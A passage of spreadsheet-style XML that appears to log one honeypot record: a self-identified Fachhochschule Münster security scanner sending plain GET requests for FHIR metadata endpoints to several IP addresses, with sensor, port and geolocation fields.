    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_NTP_H4&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_SSH_H2&amp;&amp;SMA-LAB_HTTP_H15&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_DNS_H31&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_LDAP_H6"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;123&amp;&amp;5900&amp;&amp;22&amp;&amp;80&amp;&amp;9100&amp;&amp;1080&amp;&amp;445&amp;&amp;53&amp;&amp;30238&amp;&amp;52781&amp;&amp;52780&amp;&amp;43460&amp;&amp;NA&amp;&amp;56168&amp;&amp;443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="NW"/>
    <s v="North Rhine-Westphalia"/>
    <s v="Düsseldorf District"/>
    <s v="Duisburg"/>
    <s v="2934691"/>
    <s v="47051"/>
    <s v="51.4344"/>
    <s v="6.76233"/>
    <s v="680"/>
    <s v="Verein zur Foerderung eines Deutschen Forschungsnetzes e.V."/>
    <s v="Verein zur Foerderung eines Deutschen Forschungsnetzes e.V."/>
    <s v="business"/>
    <s v="Fachhochschule Muenster"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '103.113.68.70', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': 